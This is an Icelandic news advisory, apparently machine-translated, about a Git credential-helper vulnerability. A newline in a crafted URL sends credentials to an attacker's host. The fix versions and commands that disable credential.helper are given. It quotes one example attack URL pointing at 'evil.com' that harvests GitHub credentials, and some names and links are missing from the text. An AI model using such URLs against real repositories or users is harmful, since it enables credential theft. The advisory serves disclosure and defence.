leiðréttingarútgáfur á dreifða upprunastýringarkerfinu Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 og 2.17.4, í sem útrýmdi () í stjórnandanum "", sem veldur því að skilríki eru send á rangan gestgjafa þegar git viðskiptavinur kemst í geymslu með sérsniðinni vefslóð sem inniheldur nýlínustaf. Hægt er að nota varnarleysið til að sjá til þess að skilríki frá öðrum hýsil séu send á netþjón sem stjórnað er af árásarmanninum.
Þegar þú tilgreinir vefslóð eins og „https://evil.com?%0ahost=github.com/“ mun persónuskilríkishantarinn þegar hann tengist hýslinum evil.com standast auðkenningarfæribreyturnar sem tilgreindar eru fyrir github.com. Vandamálið kemur upp þegar framkvæmdar eru aðgerðir eins og „git clone“, þar á meðal vinnsla vefslóða fyrir undireiningar (til dæmis, „git submodule update“ mun sjálfkrafa vinna úr vefslóðunum sem tilgreindar eru í .gitmodules skránni úr geymslunni). Varnarleysið er hættulegast í aðstæðum þar sem verktaki klónar geymslu án þess að sjá slóðina, til dæmis þegar unnið er með undireiningar, eða í kerfum sem framkvæma sjálfvirkar aðgerðir, til dæmis í pakkasmíðaforskriftum.
Til að loka fyrir veikleika í nýjum útgáfum að senda nýlínustaf í hvaða gildum sem er send í gegnum skilríkisskiptareglurnar. Fyrir dreifingar geturðu fylgst með útgáfu pakkauppfærslna á síðunum , , , , , , .
Sem lausn til að koma í veg fyrir vandamálið Ekki nota credential.helper þegar þú opnar opinberar geymslur og ekki nota "git clone" í "--recurse-submodules" ham með ómerktum geymslum. Til að slökkva algjörlega á credential.helper meðhöndluninni, sem gerir það og sækja lykilorð frá , varið eða skrá með lykilorðum geturðu notað skipanirnar:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Heimild: opennet.ru